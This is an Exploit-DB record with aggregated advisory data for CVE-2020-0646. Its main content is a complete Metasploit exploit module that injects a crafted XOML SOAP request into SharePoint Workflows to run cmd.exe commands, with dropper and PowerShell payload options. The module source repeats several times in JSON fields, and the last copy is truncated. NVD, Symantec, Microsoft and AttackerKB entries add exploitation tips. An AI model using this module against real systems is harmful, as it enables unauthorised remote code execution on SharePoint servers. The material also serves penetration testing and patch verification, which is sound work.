ID EDB-ID:48275 Type exploitdb Reporter Exploit-DB Modified 2020-03-31T00:00:00
Description
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(update_info(info,
'Name' => 'SharePoint Workflows XOML Injection',
'Description' => %q{
This module exploits a vulnerability within SharePoint and its .NET backend
that allows an attacker to execute commands using specially crafted XOML data
sent to SharePoint via the Workflows functionality.
},
'Author' => [
'Spencer McIntyre',
'Soroush Dalili'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2020-0646'],
['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']
],
'Platform' => 'win',
'Targets' => [
[ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
[ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],
[ 'Windows Powershell',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :windows_powershell
]
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => '2020-03-02',
'Notes' =>
{
'Stability' => [CRASH_SAFE,],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION],
},
'Privileged' => true
))
register_options([
OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),
OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),
OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])
])
end
def check
res = execute_command("echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}")
return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200
compiler_errors = extract_compiler_errors(res)
return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0
# once patched you get a specific compiler error message about the type name
return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/
CheckCode::Vulnerable
end
def extract_compiler_errors(res)
return nil unless res&.code == 200
xml_doc = res.get_xml_document
result = xml_doc.search('//*[local-name()=\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\']').text
return nil if result.length == 0
xml_result = Nokogiri::XML(result)
xml_result.xpath('//CompilerError/@Text')
end
def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super
case target['Type']
when :windows_command
execute_command(payload.encoded)
when :windows_dropper
cmd_target = targets.select {|target| target['Type'] == :windows_command}.first
execute_cmdstager({linemax: cmd_target.opts['Space']})
when :windows_powershell
execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
end
end
def escape_command(cmd)
# a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode
cmd.gsub(/([^a-zA-Z0-9 $:;\-\.=\[\]\{\}\(\)])/) { |x| "\\u%.4x" %x.unpack('C*')[0] }
end
def execute_command(cmd, opts = {})
xoml_data = <<-EOS
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages">
<workflowMarkupText>
<![CDATA[
<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
<CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe", "/c #{escape_command(cmd)}");private/**/void/**/foobar(){//' />
</SequentialWorkflowActivity>
]]>
</workflowMarkupText>
<rulesText></rulesText>
<configBlob></configBlob>
<flag>2</flag>
</ValidateWorkflowMarkupAndCreateSupportObjects>
</soap:Body>
</soap:Envelope>
EOS
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),
'ctype' => 'text/xml; charset=utf-8',
'data' => xoml_data,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
unless res&.code == 200
print_error('Non-200 HTTP response received while trying to execute the command')
end
res
end
end
{"id": "EDB-ID:48275", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SharePoint Workflows - XOML Injection (Metasploit)", "description": "", "published": "2020-03-31T00:00:00", "modified": "2020-03-31T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.exploit-db.com/exploits/48275", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2020-0646"], "lastseen": "2020-03-31T15:56:09", "viewCount": 133, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:2A3F116D-DC02-4BEA-B9AD-39F7773274AE"]}, {"type": "cve", "idList": ["CVE-2020-0646"]}, {"type": "symantec", "idList": ["SMNTC-111386"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156930"]}, {"type": "zdt", "idList": ["1337DAY-ID-34152"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0646"]}, {"type": "kitploit", "idList": ["KITPLOIT:4480301396595295532"]}, {"type": "mskb", "idList": ["KB4534977", "KB4532935", "KB4534979", "KB4532933", "KB4534978", "KB4532934", "KB4535105", "KB4535101", "KB4532938", "KB4534976"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_JAN_4528760.NASL", "SMB_NT_MS20_JAN_4534283.NASL", "SMB_NT_MS20_JAN_4534303.NASL", "SMB_NT_MS20_JAN_4534306.NASL", "SMB_NT_MS20_JAN_DOTNET.NASL", "SMB_NT_MS20_JAN_4534271.NASL", "SMB_NT_MS20_JAN_4534293.NASL", "SMB_NT_MS20_JAN_4534276.NASL", "SMB_NT_MS20_JAN_4534297.NASL", "SMB_NT_MS20_JAN_4534310.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815895", "OPENVAS:1361412562310815897", "OPENVAS:1361412562310816553", "OPENVAS:1361412562310815894", "OPENVAS:1361412562310815745", "OPENVAS:1361412562310815740", "OPENVAS:1361412562310815744", "OPENVAS:1361412562310815742", "OPENVAS:1361412562310816552", "OPENVAS:1361412562310815898"]}, {"type": "kaspersky", "idList": ["KLA11634"]}, {"type": "talosblog", "idList": ["TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF"]}], "modified": "2020-03-31T15:56:09", "rev": 2}, "score": {"value": 4.7, "vector": "NONE", "modified": "2020-03-31T15:56:09", "rev": 2}, "vulnersScore": 4.7}, "sourceHref": "https://www.exploit-db.com/download/48275", "sourceData": "# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::AutoCheck\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SharePoint Workflows XOML Injection',\r\n 'Description' => %q{\r\n This module exploits a vulnerability within SharePoint and its .NET backend\r\n that allows an attacker to execute commands using specially crafted XOML data\r\n sent to SharePoint via the Workflows functionality.\r\n },\r\n 'Author' => [\r\n 'Spencer McIntyre',\r\n 'Soroush Dalili'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['CVE', '2020-0646'],\r\n ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' => [\r\n [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\r\n [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],\r\n [ 'Windows Powershell',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :windows_powershell\r\n ]\r\n ],\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => '2020-03-02',\r\n 'Notes' =>\r\n {\r\n 'Stability' => [CRASH_SAFE,],\r\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n },\r\n 'Privileged' => true\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),\r\n OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),\r\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\r\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\r\n ])\r\n end\r\n\r\n def check\r\n res = execute_command(\"echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}\")\r\n return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200\r\n\r\n compiler_errors = extract_compiler_errors(res)\r\n return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0\r\n\r\n # once patched you get a specific compiler error message about the type name\r\n return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/\r\n\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def extract_compiler_errors(res)\r\n return nil unless res&.code == 200\r\n\r\n xml_doc = res.get_xml_document\r\n result = xml_doc.search('//*[local-name()=\\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\\']').text\r\n return nil if result.length == 0\r\n\r\n xml_result = Nokogiri::XML(result)\r\n xml_result.xpath('//CompilerError/@Text')\r\n end\r\n\r\n def exploit\r\n # NOTE: Automatic check is implemented by the AutoCheck mixin\r\n super\r\n\r\n case target['Type']\r\n when :windows_command\r\n execute_command(payload.encoded)\r\n when :windows_dropper\r\n cmd_target = targets.select {|target| target['Type'] == :windows_command}.first\r\n execute_cmdstager({linemax: cmd_target.opts['Space']})\r\n when :windows_powershell\r\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\r\n end\r\n end\r\n\r\n def escape_command(cmd)\r\n # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode\r\n cmd.gsub(/([^a-zA-Z0-9 $:;\\-\\.=\\[\\]\\{\\}\\(\\)])/) { |x| \"\\\\u%.4x\" %x.unpack('C*')[0] }\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n xoml_data = <<-EOS\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <ValidateWorkflowMarkupAndCreateSupportObjects xmlns=\"http://microsoft.com/sharepoint/webpartpages\">\r\n <workflowMarkupText>\r\n <![CDATA[\r\n <SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"foobar\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/workflow\">\r\n <CallExternalMethodActivity x:Name=\"foo\" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start(\"cmd.exe\", \"/c #{escape_command(cmd)}\");private/**/void/**/foobar(){//' />\r\n </SequentialWorkflowActivity>\r\n ]]>\r\n </workflowMarkupText>\r\n <rulesText></rulesText>\r\n <configBlob></configBlob>\r\n <flag>2</flag>\r\n </ValidateWorkflowMarkupAndCreateSupportObjects>\r\n </soap:Body>\r\n</soap:Envelope>\r\n EOS\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),\r\n 'ctype' => 'text/xml; charset=utf-8',\r\n 'data' => xoml_data,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n })\r\n\r\n unless res&.code == 200\r\n print_error('Non-200 HTTP response received while trying to execute the command')\r\n end\r\n\r\n res\r\n end\r\nend", "osvdbidlist": []}
{"attackerkb": [{"lastseen": "2020-11-18T06:45:44", "bulletinFamily": "info", "cvelist": ["CVE-2020-0646"], "description": "A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly, aka \u2018.NET Framework Remote Code Execution Injection Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at March 20, 2020 1:31pm UTC reported:\n\nThe SharePoint WorkFlow component is affected by a vulnerability within .NET which can be abused to run arbitrary code when compiling XOML files. An authenticated user would need to issue an HTTP request with crafted XOML-formatted data (for which there are public examples). The vulnerability was patched for on-premises installations of SharePoint on January 2020.\n\nA correct crafted XOML request will result in extra C# code being written to a temporary file on disk as part of the exploitation process. This is how an OS command is then executed.\n\nBoth patched and unpatched systems will return compiler error information in the XML response to the HTTP request. A patched system will have an error stating `\"Compilation failed. The type name: ... is not a valid language-independent type name.\"`. Malformed requests will include relevant information in the compiler error text, which is usually a character escaping issue. For best results escape all characters that are non-alphanumeric as unicode like `\\u####`.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 3\n", "modified": "2020-07-30T00:00:00", "published": "2020-01-14T00:00:00", "id": "AKB:2A3F116D-DC02-4BEA-B9AD-39F7773274AE", "href": "https://attackerkb.com/topics/79GOZOJWWk/cve-2020-0646", "type": "attackerkb", "title": "CVE-2020-0646", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-10-03T12:55:45", "description": "A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly, aka '.NET Framework Remote Code Execution Injection Vulnerability'.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T23:15:00", "title": "CVE-2020-0646", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646"], "modified": "2020-03-26T17:15:00", "cpe": ["cpe:/a:microsoft:.net_framework:3.5.1", "cpe:/a:microsoft:.net_framework:3.5", "cpe:/a:microsoft:.net_framework:4.6.1", "cpe:/a:microsoft:.net_framework:4.8", "cpe:/a:microsoft:.net_framework:4.7", "cpe:/a:microsoft:.net_framework:4.6.2", "cpe:/a:microsoft:.net_framework:4.7.2", "cpe:/a:microsoft:.net_framework:4.5.2", "cpe:/a:microsoft:.net_framework:4.7.1", "cpe:/a:microsoft:.net_framework:3.0", "cpe:/a:microsoft:.net_framework:4.6"], "id": "CVE-2020-0646", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0646", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:4.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2020-01-15T00:26:21", "bulletinFamily": "software", "cvelist": ["CVE-2020-0646"], "description": "### Description\n\nMicrosoft .NET Framework is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft .NET Framework 3.0 SP2 \n * Microsoft .NET Framework 3.5 \n * Microsoft .NET Framework 3.5.1 \n * Microsoft .NET Framework 4.5.2 \n * Microsoft .NET Framework 4.6 \n * Microsoft .NET Framework 4.6.1 \n * Microsoft .NET Framework 4.6.2 \n * Microsoft .NET Framework 4.7 \n * Microsoft .NET Framework 4.7.1 \n * Microsoft .NET Framework 4.7.2 \n * Microsoft .NET Framework 4.8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo mitigate the impact of a successful exploit, run the affected application as a user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nNever accept files from untrusted or unknown sources, because they may be malicious in nature. Avoid opening email attachments from unknown or questionable sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploit attempts of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2020-01-14T00:00:00", "published": "2020-01-14T00:00:00", "id": "SMNTC-111386", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111386", "type": "symantec", "title": "Microsoft .NET Framework CVE-2020-0646 Remote Code Execution Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2020-03-29T15:35:52", "description": "", "published": "2020-03-26T00:00:00", "type": "packetstorm", "title": "SharePoint Workflows XOML Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0646"], "modified": "2020-03-26T00:00:00", "id": "PACKETSTORM:156930", "href": "https://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html", "sourceData": "`# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SharePoint Workflows XOML Injection', \n'Description' => %q{ \nThis module exploits a vulnerability within SharePoint and its .NET backend \nthat allows an attacker to execute commands using specially crafted XOML data \nsent to SharePoint via the Workflows functionality. \n}, \n'Author' => [ \n'Spencer McIntyre', \n'Soroush Dalili' \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2020-0646'], \n['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/'] \n], \n'Platform' => 'win', \n'Targets' => [ \n[ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ], \n[ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ], \n[ 'Windows Powershell', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :windows_powershell \n] \n], \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => '2020-03-02', \n'Notes' => \n{ \n'Stability' => [CRASH_SAFE,], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'Reliability' => [REPEATABLE_SESSION], \n}, \n'Privileged' => true \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]), \nOptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]), \nOptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]), \nOptString.new('PASSWORD', [ true, 'The password to authenticate with' ]) \n]) \nend \n \ndef check \nres = execute_command(\"echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}\") \nreturn CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200 \n \ncompiler_errors = extract_compiler_errors(res) \nreturn CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0 \n \n# once patched you get a specific compiler error message about the type name \nreturn CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/ \n \nCheckCode::Vulnerable \nend \n \ndef extract_compiler_errors(res) \nreturn nil unless res&.code == 200 \n \nxml_doc = res.get_xml_document \nresult = xml_doc.search('//*[local-name()=\\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\\']').text \nreturn nil if result.length == 0 \n \nxml_result = Nokogiri::XML(result) \nxml_result.xpath('//CompilerError/@Text') \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \ncase target['Type'] \nwhen :windows_command \nexecute_command(payload.encoded) \nwhen :windows_dropper \ncmd_target = targets.select {|target| target['Type'] == :windows_command}.first \nexecute_cmdstager({linemax: cmd_target.opts['Space']}) \nwhen :windows_powershell \nexecute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)) \nend \nend \n \ndef escape_command(cmd) \n# a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode \ncmd.gsub(/([^a-zA-Z0-9 $:;\\-\\.=\\[\\]\\{\\}\\(\\)])/) { |x| \"\\\\u%.4x\" %x.unpack('C*')[0] } \nend \n \ndef execute_command(cmd, opts = {}) \nxoml_data = <<-EOS \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<ValidateWorkflowMarkupAndCreateSupportObjects xmlns=\"http://microsoft.com/sharepoint/webpartpages\"> \n<workflowMarkupText> \n<![CDATA[ \n<SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"foobar\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/workflow\"> \n<CallExternalMethodActivity x:Name=\"foo\" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start(\"cmd.exe\", \"/c #{escape_command(cmd)}\");private/**/void/**/foobar(){//' /> \n</SequentialWorkflowActivity> \n]]> \n</workflowMarkupText> \n<rulesText></rulesText> \n<configBlob></configBlob> \n<flag>2</flag> \n</ValidateWorkflowMarkupAndCreateSupportObjects> \n</soap:Body> \n</soap:Envelope> \nEOS \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'), \n'ctype' => 'text/xml; charset=utf-8', \n'data' => xoml_data, \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'] \n}) \n \nunless res&.code == 200 \nprint_error('Non-200 HTTP response received while trying to execute the command') \nend \n \nres \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156930/sharepoint_workflows_xoml.rb.txt"}], "mscve": [{"lastseen": "2020-08-07T11:48:22", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646"], "description": "A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nTo exploit the vulnerability, an attacker would need to pass specific input to an application utilizing susceptible .Net methods.\n\nThe security update addresses the vulnerability by correcting how the Microsoft .NET Framework validates input.\n", "edition": 3, "modified": "2020-05-12T07:00:00", "id": "MS:CVE-2020-0646", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646", "published": "2020-05-12T07:00:00", "title": ".NET Framework Remote Code Execution Injection Vulnerability", "type": "mscve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2020-03-26T19:11:29", "description": "This Metasploit module exploits a vulnerability within SharePoint and its .NET backend that allows an attacker to execute commands using specially crafted XOML data sent to SharePoint via the Workflows functionality.", "edition": 1, "published": "2020-03-26T00:00:00", "title": "SharePoint Workflows XOML Injection Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0646"], "modified": "2020-03-26T00:00:00", "id": "1337DAY-ID-34152", "href": "https://0day.today/exploit/description/34152", "sourceData": "# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::AutoCheck\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SharePoint Workflows XOML Injection',\r\n 'Description' => %q{\r\n This module exploits a vulnerability within SharePoint and its .NET backend\r\n that allows an attacker to execute commands using specially crafted XOML data\r\n sent to SharePoint via the Workflows functionality.\r\n },\r\n 'Author' => [\r\n 'Spencer McIntyre',\r\n 'Soroush Dalili'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['CVE', '2020-0646'],\r\n ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' => [\r\n [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\r\n [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],\r\n [ 'Windows Powershell',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :windows_powershell\r\n ]\r\n ],\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => '2020-03-02',\r\n 'Notes' =>\r\n {\r\n 'Stability' => [CRASH_SAFE,],\r\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n },\r\n 'Privileged' => true\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),\r\n OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),\r\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\r\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\r\n ])\r\n end\r\n\r\n def check\r\n res = execute_command(\"echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}\")\r\n return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200\r\n\r\n compiler_errors = extract_compiler_errors(res)\r\n return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0\r\n\r\n # once patched you get a specific compiler error message about the type name\r\n return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/\r\n\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def extract_compiler_errors(res)\r\n return nil unless res&.code == 200\r\n\r\n xml_doc = res.get_xml_document\r\n result = xml_doc.search('//*[local-name()=\\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\\']').text\r\n return nil if result.length == 0\r\n\r\n xml_result = Nokogiri::XML(result)\r\n xml_result.xpath('//CompilerError/@Text')\r\n end\r\n\r\n def exploit\r\n # NOTE: Automatic check is implemented by the AutoCheck mixin\r\n super\r\n\r\n case target['Type']\r\n when :windows_command\r\n execute_command(payload.encoded)\r\n when :windows_dropper\r\n cmd_target = targets.select {|target| target['Type'] == :windows_command}.first\r\n execute_cmdstager({linemax: cmd_target.opts['Space']})\r\n when :windows_powershell\r\n 